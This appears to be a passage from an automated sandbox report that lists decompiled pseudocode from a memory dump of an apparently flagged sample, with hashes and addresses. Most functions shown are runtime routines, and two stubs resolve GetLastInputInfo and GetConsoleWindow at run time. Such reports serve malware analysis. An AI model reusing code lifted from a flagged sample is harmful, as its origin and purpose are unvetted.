                      				_t2 = GetProcAddress(LoadLibraryA("User32.dll"), "GetLastInputInfo");
                      				 *0x7aca80 = _t2;
                      				return _t2;
                      			}

                      APIs
                      • LoadLibraryA.KERNEL32(User32.dll,GetLastInputInfo), ref: 00741472
                      • GetProcAddress.KERNEL32(00000000), ref: 00741479
                      Strings
                      Memory Dump Source
                      • Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true
                      • Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: AddressLibraryLoadProc
                      • String ID: GetLastInputInfo$User32.dll
                      • API String ID: 2574300362-1519888992
                      • Opcode ID: 58a68819c280b6d2402580d4764d607062eb8f4cdda9c8232f33024e139d8f13
                      • Instruction ID: 3e714a470638673ba01dfdcb21a82bd0188c2a8d451d2b4540e421c676b52419
                      • Opcode Fuzzy Hash: 58a68819c280b6d2402580d4764d607062eb8f4cdda9c8232f33024e139d8f13
                      • Instruction Fuzzy Hash: F7B092F4640700EB8A019BB8AD0D8093A7AB6C6702700C246F506821A0CB7C8101AB29
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E00741485() {
                      				_Unknown_base(*)()* _t2;
                      
                      				_t2 = GetProcAddress(LoadLibraryA("kernel32.dll"), "GetConsoleWindow");
                      				 *0x7aca84 = _t2;
                      				return _t2;
                      			}

                      APIs
                      • LoadLibraryA.KERNEL32(kernel32.dll,GetConsoleWindow), ref: 0074148F
                      • GetProcAddress.KERNEL32(00000000), ref: 00741496
                      Strings
                      Memory Dump Source
                      • Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true
                      • Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: AddressLibraryLoadProc
                      • String ID: GetConsoleWindow$kernel32.dll
                      • API String ID: 2574300362-100875112
                      • Opcode ID: cfa5eac718b5d21d85367b4758c021dd532fe87c98521b9323549974a113ec3f
                      • Instruction ID: f28ac28f1bdd1b52de6632ace039c1753300410c38fc741c4a69868ab06b29ae
                      • Opcode Fuzzy Hash: cfa5eac718b5d21d85367b4758c021dd532fe87c98521b9323549974a113ec3f
                      • Instruction Fuzzy Hash: BCB092F4542300EB8A019BB4AE0D8093B7AB68A706701C546B601821A4CA7C41019B29
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 75%
                      			E00783812(void* __edx, signed int* _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, signed int _a28, intOrPtr _a32, intOrPtr _a36) {
                      				signed int _v8;
                      				signed int _v12;
                      				signed int _v16;
                      				unsigned int _v20;
                      				signed int _v28;
                      				signed int _v32;
                      				signed int _v36;
                      				char _v40;
                      				intOrPtr _v48;
                      				char _v52;
                      				void* __ebx;
                      				void* __edi;
                      				void* _t86;
                      				signed int _t92;
                      				signed int _t93;
                      				signed int _t94;
                      				signed int _t100;
                      				void* _t101;
                      				void* _t102;
                      				void* _t104;
                      				void* _t107;
                      				void* _t109;
                      				void* _t111;
                      				void* _t115;
                      				char* _t116;
                      				void* _t119;
                      				signed int _t121;
                      				signed int _t128;
                      				signed int* _t129;
                      				signed int _t136;
                      				signed int _t137;
                      				char _t138;
                      				signed int _t139;
                      				signed int _t142;
                      				signed int _t146;
                      				signed int _t151;
                      				char _t156;
                      				char _t157;
                      				void* _t161;
                      				unsigned int _t162;
                      				signed int _t164;
                      				signed int _t166;
                      				signed int _t170;
                      				void* _t171;
                      				signed int* _t172;
                      				signed int _t174;
                      				signed int _t181;
                      				signed int _t182;
                      				signed int _t183;
                      				signed int _t184;
                      				signed int _t185;
                      				signed int _t186;
                      				signed int _t187;
                      
                      				_t171 = __edx;
                      				_t181 = _a24;
                      				if(_t181 < 0) {
                      					_t181 = 0;
                      				}
                      				_t184 = _a8;
                      				 *_t184 = 0;
                      				E00775507(0,  &_v52, _t171, _a36);
                      				_t5 = _t181 + 0xb; // 0xb
                      				if(_a12 > _t5) {
                      					_t172 = _a4;
                      					_t142 = _t172[1];
                      					_v36 =  *_t172;
                      					__eflags = (_t142 >> 0x00000014 & 0x000007ff) - 0x7ff;
                      					if((_t142 >> 0x00000014 & 0x000007ff) != 0x7ff) {
                      						L11:
                      						__eflags = _t142 & 0x80000000;
                      						if((_t142 & 0x80000000) != 0) {
                      							 *_t184 = 0x2d;
                      							_t184 = _t184 + 1;
                      							__eflags = _t184;
                      						}
                      						__eflags = _a28;
                      						_v16 = 0x3ff;
                      						_t136 = ((0 | _a28 == 0x00000000) - 0x00000001 & 0xffffffe0) + 0x27;
                      						__eflags = _t172[1] & 0x7ff00000;
                      						_v32 = _t136;
                      						_t86 = 0x30;
                      						if((_t172[1] & 0x7ff00000) != 0) {
                      							 *_t184 = 0x31;
                      							_t185 = _t184 + 1;
                      							__eflags = _t185;
                      						} else {
                      							 *_t184 = _t86;
                      							_t185 = _t184 + 1;
                      							_t164 =  *_t172 | _t172[1] & 0x000fffff;
                      							__eflags = _t164;
                      							if(_t164 != 0) {
                      								_v16 = 0x3fe;
                      							} else {
                      								_v16 = _v16 & _t164;
                      							}
                      						}
                      						_t146 = _t185;
                      						_t186 = _t185 + 1;
                      						_v28 = _t146;
                      						__eflags = _t181;
                      						if(_t181 != 0) {
                      							_t30 = _v48 + 0x88; // 0x74000000
                      							 *_t146 =  *((intOrPtr*)( *((intOrPtr*)( *_t30))));
                      						} else {
                      							 *_t146 = 0;
                      						}
                      						_t92 = _t172[1] & 0x000fffff;
                      						__eflags = _t92;
                      						_v20 = _t92;
                      						if(_t92 > 0) {
                      							L23:
                      							_t33 =  &_v8;
                      							 *_t33 = _v8 & 0x00000000;
                      							__eflags =  *_t33;
                      							_t147 = 0xf0000;
                      							_t93 = 0x30;
                      							_v12 = _t93;
                      							_v20 = 0xf0000;
                      							do {
                      								__eflags = _t181;
                      								if(_t181 <= 0) {
                      									break;
                      								}
                      								_t119 = E00790DE0( *_t172 & _v8, _v12, _t172[1] & _t147 & 0x000fffff);
                      								_t161 = 0x30;
                      								_t121 = _t119 + _t161 & 0x0000ffff;
                      								__eflags = _t121 - 0x39;
                      								if(_t121 > 0x39) {
                      									_t121 = _t121 + _t136;
                      									__eflags = _t121;
                      								}
                      								_t162 = _v20;
                      								_t172 = _a4;
                      								 *_t186 = _t121;
                      								_t186 = _t186 + 1;
                      								_v8 = (_t162 << 0x00000020 | _v8) >> 4;
                      								_t147 = _t162 >> 4;
                      								_t93 = _v12 - 4;
                      								_t181 = _t181 - 1;
                      								_v20 = _t162 >> 4;
                      								_v12 = _t93;
                      								__eflags = _t93;
                      							} while (_t93 >= 0);
                      							__eflags = _t93;
                      							if(_t93 < 0) {
                      								goto L39;
                      							}
                      							_t115 = E00790DE0( *_t172 & _v8, _v12, _t172[1] & _t147 & 0x000fffff);
                      							__eflags = _t115 - 8;
                      							if(_t115 <= 8) {
                      								goto L39;
                      							}
                      							_t54 = _t186 - 1; // 0xff8bc35f
                      							_t116 = _t54;
                      							_t138 = 0x30;
                      							while(1) {
                      								_t156 =  *_t116;
                      								__eflags = _t156 - 0x66;
                      								if(_t156 == 0x66) {
                      									goto L33;
                      								}
                      								__eflags = _t156 - 0x46;
                      								if(_t156 != 0x46) {
                      									_t139 = _v32;
                      									__eflags = _t116 - _v28;
                      									if(_t116 == _v28) {
                      										_t57 = _t116 - 1;
                      										 *_t57 =  *(_t116 - 1) + 1;
                      										__eflags =  *_t57;
                      									} else {
                      										_t157 =  *_t116;
                      										__eflags = _t157 - 0x39;
                      										if(_t157 != 0x39) {
                      											 *_t116 = _t157 + 1;
                      										} else {
                      											 *_t116 = _t139 + 0x3a;
                      										}
                      									}
                      									goto L39;
                      								}
                      								L33:
                      								 *_t116 = _t138;
                      								_t116 = _t116 - 1;
                      							}
                      						} else {
                      							__eflags =  *_t172;
                      							if( *_t172 <= 0) {
                      								L39:
                      								__eflags = _t181;
                      								if(_t181 > 0) {
                      									_push(_t181);
                      									_t111 = 0x30;
                      									_push(_t111);
                      									_push(_t186);
                      									E00771F00(_t181);
                      									_t186 = _t186 + _t181;
                      									__eflags = _t186;
                      								}
                      								_t94 = _v28;
                      								__eflags =  *_t94;
                      								if( *_t94 == 0) {
                      									_t186 = _t94;
                      								}
                      								__eflags = _a28;
                      								 *_t186 = ((_t94 & 0xffffff00 | _a28 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x70;
                      								_t174 = _a4[1];
                      								_t100 = E00790DE0( *_a4, 0x34, _t174);
                      								_t137 = 0;
                      								_t151 = (_t100 & 0x000007ff) - _v16;
                      								__eflags = _t151;
                      								asm("sbb ebx, ebx");
                      								if(__eflags < 0) {
                      									L47:
                      									 *(_t186 + 1) = 0x2d;
                      									_t187 = _t186 + 2;
                      									__eflags = _t187;
                      									_t151 =  ~_t151;
                      									asm("adc ebx, 0x0");
                      									_t137 =  ~_t137;
                      									goto L48;
                      								} else {
                      									if(__eflags > 0) {
                      										L46:
                      										 *(_t186 + 1) = 0x2b;
                      										_t187 = _t186 + 2;
                      										L48:
                      										_t182 = _t187;
                      										_t101 = 0x30;
                      										 *_t187 = _t101;
                      										__eflags = _t137;
                      										if(__eflags < 0) {
                      											L56:
                      											__eflags = _t187 - _t182;
                      											if(_t187 != _t182) {
                      												L60:
                      												_push(0);
                      												_push(0xa);
                      												_push(_t137);
                      												_push(_t151);
                      												_t102 = E00790AE0();
                      												_v32 = _t174;
                      												 *_t187 = _t102 + 0x30;
                      												_t187 = _t187 + 1;
                      												__eflags = _t187;
                      												L61:
                      												_t104 = 0x30;
                      												_t183 = 0;
                      												__eflags = 0;
                      												 *_t187 = _t151 + _t104;
                      												 *(_t187 + 1) = 0;
                      												goto L62;
                      											}
                      											__eflags = _t137;
                      											if(__eflags < 0) {
                      												goto L61;
                      											}
                      											if(__eflags > 0) {
                      												goto L60;
                      											}
                      											__eflags = _t151 - 0xa;
                      											if(_t151 < 0xa) {
                      												goto L61;
                      											}
                      											goto L60;
                      										}
                      										if(__eflags > 0) {
                      											L51:
                      											_push(0);
                      											_push(0x3e8);
                      											_push(_t137);
                      											_push(_t151);
                      											_t107 = E00790AE0();
                      											_v32 = _t174;
                      											 *_t187 = _t107 + 0x30;
                      											_t187 = _t187 + 1;
                      											__eflags = _t187 - _t182;
                      											if(_t187 != _t182) {
                      												L55:
                      												_push(0);
                      												_push(0x64);
                      												_push(_t137);
                      												_push(_t151);
                      												_t109 = E00790AE0();
                      												_v32 = _t174;
                      												 *_t187 = _t109 + 0x30;
                      												_t187 = _t187 + 1;
                      												__eflags = _t187;
                      												goto L56;
                      											}
                      											L52:
                      											__eflags = _t137;
                      											if(__eflags < 0) {
                      												goto L56;
                      											}
                      											if(__eflags > 0) {
                      												goto L55;
                      											}
                      											__eflags = _t151 - 0x64;
                      											if(_t151 < 0x64) {
                      												goto L56;
                      											}
                      											goto L55;
                      										}
                      										__eflags = _t151 - 0x3e8;
                      										if(_t151 < 0x3e8) {
                      											goto L52;
                      										}
                      										goto L51;
                      									}
                      									__eflags = _t151;
                      									if(_t151 < 0) {
                      										goto L47;
                      									}
                      									goto L46;
                      								}
                      							}
                      							goto L23;
                      						}
                      					}
                      					__eflags = 0;
                      					if(0 != 0) {
                      						goto L11;
                      					} else {
                      						_t183 = E00783B15(0, _t142, 0, _t172, _t184, _a12, _a16, _a20, _t181, 0, _a32, 0);
                      						__eflags = _t183;
                      						if(_t183 == 0) {
                      							_t128 = E00790EC0(_t184, 0x65);
                      							_pop(_t166);
                      							__eflags = _t128;
                      							if(_t128 != 0) {
                      								__eflags = _a28;
                      								_t170 = ((_t166 & 0xffffff00 | _a28 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x70;
                      								__eflags = _t170;
                      								 *_t128 = _t170;
                      								 *((char*)(_t128 + 3)) = 0;
                      							}
                      							_t183 = 0;
                      						} else {
                      							 *_t184 = 0;
                      						}
                      						goto L62;
                      					}
                      				} else {
                      					_t129 = E0077A504();
                      					_t183 = 0x22;
                      					 *_t129 = _t183;
                      					E0077695D();
                      					L62:
                      					if(_v40 != 0) {
                      						 *(_v52 + 0x350) =  *(_v52 + 0x350) & 0xfffffffd;
                      					}
                      					return _t183;
                      				}
                      			}

                      0x00783812
                      0x0078381d
                      0x00783824
                      0x00783826
                      0x00783826
                      0x00783828
                      0x00783831
                      0x00783833
                      0x00783838
                      0x0078383e
                      0x00783854
                      0x00783859
                      0x0078385c
                      0x00783869
                      0x0078386e
                      0x007838c2
                      0x007838ca
                      0x007838cc
                      0x007838ce
                      0x007838d1
                      0x007838d1
                      0x007838d1
                      0x007838d7
                      0x007838df
                      0x007838f2
                      0x007838f5
                      0x007838f7
                      0x007838fa
                      0x007838fb
                      0x0078391c
                      0x0078391f
                      0x0078391f
                      0x007838fd
                      0x007838fd
                      0x007838ff
                      0x0078390a
                      0x0078390a
                      0x0078390c
                      0x00783913
                      0x0078390e
                      0x0078390e
                      0x0078390e
                      0x0078390c
                      0x00783920
                      0x00783922
                      0x00783923
                      0x00783926
                      0x00783928
                      0x00783932
                      0x0078393c
                      0x0078392a
                      0x0078392a
                      0x0078392a
                      0x00783941
                      0x00783941
                      0x00783946
                      0x00783949
                      0x00783954
                      0x00783954
                      0x00783954
                      0x00783954
                      0x00783958
                      0x0078395f
                      0x00783960
                      0x00783963
                      0x00783966
                      0x00783966
                      0x00783968
                      0x00000000
                      0x00000000
                      0x00783980
                      0x00783987
                      0x0078398b
                      0x0078398e
                      0x00783991
                      0x00783993
                      0x00783993
                      0x00783993
                      0x00783995
                      0x00783998
                      0x0078399b
                      0x0078399d
                      0x007839a5
                      0x007839ab
                      0x007839ae
                      0x007839b1
                      0x007839b2
                      0x007839b5
                      0x007839b8
                      0x007839b8
                      0x007839bd
                      0x007839c0
                      0x00000000
                      0x00000000
                      0x007839d8
                      0x007839dd
                      0x007839e1
                      0x00000000
                      0x00000000
                      0x007839e5
                      0x007839e5
                      0x007839e8
                      0x007839e9
                      0x007839e9
                      0x007839eb
                      0x007839ee
                      0x00000000
                      0x00000000
                      0x007839f0
                      0x007839f3
                      0x007839fa
                      0x007839fd
                      0x00783a00
                      0x00783a16
                      0x00783a16
                      0x00783a16
                      0x00783a02
                      0x00783a02
                      0x00783a04
                      0x00783a07
                      0x00783a12
                      0x00783a09
                      0x00783a0c
                      0x00783a0c
                      0x00783a07
                      0x00000000
                      0x00783a00
                      0x007839f5
                      0x007839f5
                      0x007839f7
                      0x007839f7
                      0x0078394b
                      0x0078394b
                      0x0078394e
                      0x00783a19
                      0x00783a19
                      0x00783a1b
                      0x00783a1d
                      0x00783a20
                      0x00783a21
                      0x00783a22
                      0x00783a23
                      0x00783a2b
                      0x00783a2b
                      0x00783a2b
                      0x00783a2d
                      0x00783a30
                      0x00783a33
                      0x00783a35
                      0x00783a35
                      0x00783a37
                      0x00783a49
                      0x00783a4d
                      0x00783a50
                      0x00783a57
                      0x00783a5f
                      0x00783a5f
                      0x00783a62
                      0x00783a64
                      0x00783a75
                      0x00783a75
                      0x00783a79
                      0x00783a79
                      0x00783a7c
                      0x00783a7e
                      0x00783a81
                      0x00000000
                      0x00783a66
                      0x00783a66
                      0x00783a6c
                      0x00783a6c
                      0x00783a70
                      0x00783a83
                      0x00783a83
                      0x00783a87
                      0x00783a88
                      0x00783a8a
                      0x00783a8c
                      0x00783acd
                      0x00783acd
                      0x00783acf
                      0x00783adc
                      0x00783adc
                      0x00783ade
                      0x00783ae0
                      0x00783ae1
                      0x00783ae2
                      0x00783ae9
                      0x00783aec
                      0x00783aee
                      0x00783aee
                      0x00783aef
                      0x00783af1
                      0x00783af4
                      0x00783af4
                      0x00783af6
                      0x00783af8
                      0x00000000
                      0x00783af8
                      0x00783ad1
                      0x00783ad3
                      0x00000000
                      0x00000000
                      0x00783ad5
                      0x00000000
                      0x00000000
                      0x00783ad7
                      0x00783ada
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00783ada
                      0x00783a93
                      0x00783a99
                      0x00783a99
                      0x00783a9b
                      0x00783a9c
                      0x00783a9d
                      0x00783a9e
                      0x00783aa5
                      0x00783aa8
                      0x00783aaa
                      0x00783aab
                      0x00783aad
                      0x00783aba
                      0x00783aba
                      0x00783abc
                      0x00783abe
                      0x00783abf
                      0x00783ac0
                      0x00783ac7
                      0x00783aca
                      0x00783acc
                      0x00783acc
                      0x00000000
                      0x00783acc
                      0x00783aaf
                      0x00783aaf
                      0x00783ab1
                      0x00000000
                      0x00000000
                      0x00783ab3
                      0x00000000
                      0x00000000
                      0x00783ab5
                      0x00783ab8
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00783ab8
                      0x00783a95
                      0x00783a97
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00783a97
                      0x00783a68
                      0x00783a6a
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00783a6a
                      0x00783a64
                      0x00000000
                      0x0078394e
                      0x00783949
                      0x00783870
                      0x00783872
                      0x00000000
                      0x00783874
                      0x0078388a
                      0x0078388f
                      0x00783891
                      0x0078389d
                      0x007838a3
                      0x007838a4
                      0x007838a6
                      0x007838a8
                      0x007838b3
                      0x007838b3
                      0x007838b6
                      0x007838b8
                      0x007838b8
                      0x007838bb
                      0x00783893
                      0x00783893
                      0x00783893
                      0x00000000
                      0x00783891
                      0x00783840
                      0x00783840
                      0x00783847
                      0x00783848
                      0x0078384a
                      0x00783afc
                      0x00783b00
                      0x00783b05
                      0x00783b05
                      0x00783b14
                      0x00783b14

                      APIs
                      Memory Dump Source
                      • Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true
                      • Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: __alldvrm$_strrchr
                      • String ID:
                      • API String ID: 1036877536-0
                      • Opcode ID: c6ef87be5afec7be64c81fb389682078d407a9cdd0e7a8f7fa33338ae39b2213
                      • Instruction ID: ad6440ecf94c82f44ac8b6a31ad7e14c614885705b0cea8143f8c5c512f30c84
                      • Opcode Fuzzy Hash: c6ef87be5afec7be64c81fb389682078d407a9cdd0e7a8f7fa33338ae39b2213
                      • Instruction Fuzzy Hash: 3CA17A72A403869FDB25EF1CC8817AEBBE5EF11750F14816DE4C59B282C27C9E41C791
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 94%
                      			E0079029A(signed int __edx, intOrPtr _a4, intOrPtr _a8, int _a12) {
                      				int _v8;
                      				intOrPtr _v12;
                      				signed int _v16;
                      				signed int _v20;
                      				void* __ebx;
                      				void* __edi;
                      				void* __esi;
                      				signed int _t16;
                      				signed int _t17;
                      				int _t20;
                      				signed int _t21;
                      				int _t23;
                      				signed int _t25;
                      				int _t28;
                      				intOrPtr* _t30;
                      				int _t34;
                      				int _t35;
                      				void* _t36;
                      				intOrPtr* _t37;
                      				intOrPtr* _t38;
                      				int _t46;
                      				void* _t54;
                      				void* _t56;
                      				signed int _t58;
                      				int _t61;
                      				int _t63;
                      				void* _t64;
                      				void* _t65;
                      				void* _t66;
                      
                      				_t58 = __edx;
                      				_t59 = _a4;
                      				_t61 = 0;
                      				_t16 = E00785A9E(_a4, 0, 0, 1);
                      				_v20 = _t16;
                      				_v16 = __edx;
                      				_t65 = _t64 + 0x10;
                      				if((_t16 & __edx) != 0xffffffff) {
                      					_t17 = E00785A9E(_t59, 0, 0, 2);
                      					_t66 = _t65 + 0x10;
                      					_t51 = _t17 & __edx;
                      					__eflags = (_t17 & __edx) - 0xffffffff;
                      					if((_t17 & __edx) == 0xffffffff) {
                      						goto L1;
                      					}
                      					_t46 = _a8 - _t17;
                      					__eflags = _t46;
                      					_t20 = _a12;
                      					asm("sbb eax, edx");
                      					_v8 = _t20;
                      					if(__eflags < 0) {
                      						L24:
                      						__eflags = _t20 - _t61;
                      						if(__eflags > 0) {
                      							L19:
                      							_t21 = E00785A9E(_t59, _v20, _v16, _t61);
                      							__eflags = (_t21 & _t58) - 0xffffffff;
                      							if((_t21 & _t58) != 0xffffffff) {
                      								_t23 = 0;
                      								__eflags = 0;
                      								L31:
                      								return _t23;
                      							}
                      							L20:
                      							_t23 =  *((intOrPtr*)(E0077A504()));
                      							goto L31;
                      						}
                      						if(__eflags < 0) {
                      							L27:
                      							_t25 = E00785A9E(_t59, _a8, _a12, _t61);
                      							_t66 = _t66 + 0x10;
                      							__eflags = (_t25 & _t58) - 0xffffffff;
                      							if((_t25 & _t58) == 0xffffffff) {
                      								goto L20;
                      							}
                      							_t28 = SetEndOfFile(E00788718(_t59));
                      							__eflags = _t28;
                      							if(_t28 != 0) {
                      								goto L19;
                      							}
                      							 *((intOrPtr*)(E0077A504())) = 0xd;
                      							_t30 = E0077A4F1();
                      							 *_t30 = GetLastError();
                      							goto L20;
                      						}
                      						__eflags = _t46 - _t61;
                      						if(_t46 >= _t61) {
                      							goto L19;
                      						}
                      						goto L27;
                      					}
                      					if(__eflags > 0) {
                      						L6:
                      						_t63 = E0077F348(_t51, 0x1000, 1);
                      						_pop(_t54);
                      						__eflags = _t63;
                      						if(_t63 != 0) {
                      							_v12 = E0077DB54(_t54, _t59, 0x8000);
                      							_t34 = _v8;
                      							_pop(_t56);
                      							do {
                      								__eflags = _t34;
                      								if(__eflags < 0) {
                      									L13:
                      									_t35 = _t46;
                      									L14:
                      									_t36 = E007851E9(_t46, _t59, _t63, _t59, _t63, _t35);
                      									_t66 = _t66 + 0xc;
                      									__eflags = _t36 - 0xffffffff;
                      									if(_t36 == 0xffffffff) {
                      										_t37 = E0077A4F1();
                      										__eflags =  *_t37 - 5;
                      										if( *_t37 == 5) {
                      											 *((intOrPtr*)(E0077A504())) = 0xd;
                      										}
                      										L23:
                      										_t38 = E0077A504();
                      										E007801F5(_t63);
                      										_t23 =  *_t38;
                      										goto L31;
                      									}
                      									asm("cdq");
                      									_t46 = _t46 - _t36;
                      									_t34 = _v8;
                      									asm("sbb eax, edx");
                      									_v8 = _t34;
                      									__eflags = _t34;
                      									if(__eflags > 0) {
                      										L12:
                      										_t35 = 0x1000;
                      										goto L14;
                      									}
                      									if(__eflags < 0) {
                      										break;
                      									}
                      									goto L17;
                      								}
                      								if(__eflags > 0) {
                      									goto L12;
                      								}
                      								__eflags = _t46 - 0x1000;
                      								if(_t46 < 0x1000) {
                      									goto L13;
                      								}
                      								goto L12;
                      								L17:
                      								__eflags = _t46;
                      							} while (_t46 != 0);
                      							E0077DB54(_t56, _t59, _v12);
                      							E007801F5(_t63);
                      							_t66 = _t66 + 0xc;
                      							_t61 = 0;
                      							__eflags = 0;
                      							goto L19;
                      						}
                      						 *((intOrPtr*)(E0077A504())) = 0xc;
                      						goto L23;
                      					}
                      					__eflags = _t46;
                      					if(_t46 <= 0) {
                      						goto L24;
                      					}
                      					goto L6;
                      				}
                      				L1:
                      				return  *((intOrPtr*)(E0077A504()));
                      			}

                      0x0079029a
                      0x007902a4
                      0x007902a7
                      0x007902ae
                      0x007902b5
                      0x007902ba
                      0x007902bd
                      0x007902c3
                      0x007902d6
                      0x007902dd
                      0x007902e0
                      0x007902e2
                      0x007902e5
                      0x00000000
                      0x00000000
                      0x007902eb
                      0x007902eb
                      0x007902ed
                      0x007902f0
                      0x007902f2
                      0x007902f5
                      0x007903d3
                      0x007903d3
                      0x007903d5
                      0x0079038c
                      0x00790394
                      0x0079039e
                      0x007903a1
                      0x00790422
                      0x00790422
                      0x00790424
                      0x00000000
                      0x00790424
                      0x007903a3
                      0x007903a8
                      0x00000000
                      0x007903a8
                      0x007903d7
                      0x007903dd
                      0x007903e5
                      0x007903ec
                      0x007903ef
                      0x007903f2
                      0x00000000
                      0x00000000
                      0x007903fc
                      0x00790402
                      0x00790404
                      0x00000000
                      0x00000000
                      0x0079040b
                      0x00790411
                      0x0079041e
                      0x00000000
                      0x0079041e
                      0x007903d9
                      0x007903db
                      0x00000000
                      0x00000000
                      0x00000000
                      0x007903db
                      0x007902fb
                      0x00790305
                      0x00790311
                      0x00790314
                      0x00790315
                      0x00790317
                      0x00790335
                      0x00790338
                      0x0079033b
                      0x0079033c
                      0x0079033c
                      0x0079033e
                      0x00790351
                      0x00790351
                      0x00790353
                      0x00790356
                      0x0079035b
                      0x0079035e
                      0x00790361
                      0x007903ac
                      0x007903b1
                      0x007903b4
                      0x007903bb
                      0x007903bb
                      0x007903c1
                      0x007903c1
                      0x007903c9
                      0x007903cf
                      0x00000000
                      0x007903cf
                      0x00790363
                      0x00790364
                      0x00790366
                      0x00790369
                      0x0079036b
                      0x0079036e
                      0x00790370
                      0x0079034a
                      0x0079034a
                      0x00000000
                      0x0079034a
                      0x00790372
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00790372
                      0x00790340
                      0x00000000
                      0x00000000
                      0x00790342
                      0x00790348
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00790374
                      0x00790374
                      0x00790374
                      0x0079037c
                      0x00790382
                      0x00790387
                      0x0079038a
                      0x0079038a
                      0x00000000
                      0x0079038a
                      0x0079031e
                      0x00000000
                      0x0079031e
                      0x007902fd
                      0x007902ff
                      0x00000000
                      0x00000000
                      0x00000000
                      0x007902ff
                      0x007902c5
                      0x00000000

                      APIs
                      Memory Dump Source
                      • Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true
                      • Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: _free
                      • String ID:
                      • API String ID: 269201875-0
                      • Opcode ID: ad58bd653046d1e95f88d0711a5d120a2c9a3794c83f158ae1a9422eb7b77352
                      • Instruction ID: c26fed29ba916375b13df8ced3270b512e88e4f89915285e3d89ad73918bed6c
                      • Opcode Fuzzy Hash: ad58bd653046d1e95f88d0711a5d120a2c9a3794c83f158ae1a9422eb7b77352
                      • Instruction Fuzzy Hash: D1410831A20510EFEF247BBCAC89A6E3AB8EF41370F144659F518D6192E67C895097E2
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 95%
                      			E0077C481(void* _a4, intOrPtr* _a8) {
                      				char _v5;
                      				intOrPtr _v12;
                      				char _v16;
                      				signed int _t44;
                      				char _t47;
                      				intOrPtr _t50;
                      				signed int _t52;
                      				signed int _t56;
                      				signed int _t57;
                      				void* _t59;
                      				signed int _t63;
                      				signed int _t65;
                      				char _t67;
                      				intOrPtr* _t68;
                      				intOrPtr* _t69;
                      				intOrPtr* _t71;
                      				intOrPtr _t75;
                      				void* _t76;
                      				void* _t77;
                      				signed int _t80;
                      				intOrPtr _t82;
                      				void* _t86;
                      				signed int _t87;
                      				void* _t89;
                      				signed int _t91;
                      				intOrPtr* _t98;
                      				void* _t101;
                      				intOrPtr _t102;
                      				intOrPtr _t103;
                      
                      				_t101 = _a4;
                      				if(_t101 != 0) {
                      					_t80 = 9;
                      					memset(_t101, _t44 | 0xffffffff, _t80 << 2);
                      					_t98 = _a8;
                      					__eflags = _t98;
                      					if(_t98 != 0) {
                      						_t82 =  *((intOrPtr*)(_t98 + 4));
                      						_t47 =  *_t98;
                      						_v16 = _t47;
                      						_v12 = _t82;
                      						__eflags = _t82 - 0xffffffff;
                      						if(__eflags > 0) {
                      							L7:
                      							_t89 = 7;
                      							__eflags = _t82 - _t89;
                      							if(__eflags < 0) {
                      								L12:
                      								_v5 = 0;
                      								_t50 = E0077C5CE(_t82, __eflags,  &_v16,  &_v5);
                      								_t75 = _v16;
                      								 *((intOrPtr*)(_t101 + 0x14)) = _t50;
                      								_t52 = E00790BC0(_t75, _v12, 0x15180, 0);
                      								 *(_t101 + 0x1c) = _t52;
                      								_t86 = 0x7991d8;
                      								_t76 = _t75 - _t52 * 0x15180;
                      								asm("sbb eax, edx");
                      								__eflags = _v5;
                      								if(_v5 == 0) {
                      									_t86 = 0x7991a4;
                      								}
                      								_t91 =  *(_t101 + 0x1c);
                      								_t56 = 1;
                      								__eflags =  *((intOrPtr*)(_t86 + 4)) - _t91;
                      								if( *((intOrPtr*)(_t86 + 4)) >= _t91) {
                      									L16:
                      									_t57 = _t56 - 1;
                      									 *(_t101 + 0x10) = _t57;
                      									 *((intOrPtr*)(_t101 + 0xc)) = _t91 -  *((intOrPtr*)(_t86 + _t57 * 4));
                      									_t59 = E00790BC0( *_t98,  *((intOrPtr*)(_t98 + 4)), 0x15180, 0);
                      									_t87 = 7;
                      									asm("cdq");
                      									 *(_t101 + 0x18) = (_t59 + 4) % _t87;
                      									_t63 = E00790BC0(_t76, _v12, 0xe10, 0);
                      									 *(_t101 + 8) = _t63;
                      									_t77 = _t76 - _t63 * 0xe10;
                      									asm("sbb edi, edx");
                      									_t65 = E00790BC0(_t77, _v12, 0x3c, 0);
                      									 *(_t101 + 0x20) =  *(_t101 + 0x20) & 0x00000000;
                      									 *(_t101 + 4) = _t65;
                      									_t67 = 0;
                      									__eflags = 0;
                      									 *_t101 = _t77 - _t65 * 0x3c;
                      									L17:
                      									return _t67;
                      								} else {
                      									do {
                      										_t56 = _t56 + 1;
                      										__eflags =  *((intOrPtr*)(_t86 + _t56 * 4)) - _t91;
                      									} while ( *((intOrPtr*)(_t86 + _t56 * 4)) < _t91);
                      									goto L16;
                      								}
                      							}
                      							if(__eflags > 0) {
                      								L10:
                      								_t68 = E0077A504();
                      								_t102 = 0x16;
                      								 *_t68 = _t102;
                      								L11:
                      								_t67 = _t102;
                      								goto L17;
                      							}
                      							__eflags = _t47 - 0x934126cf;
                      							if(__eflags <= 0) {
                      								goto L12;
                      							}
                      							goto L10;
                      						}
                      						if(__eflags < 0) {
                      							goto L10;
                      						}
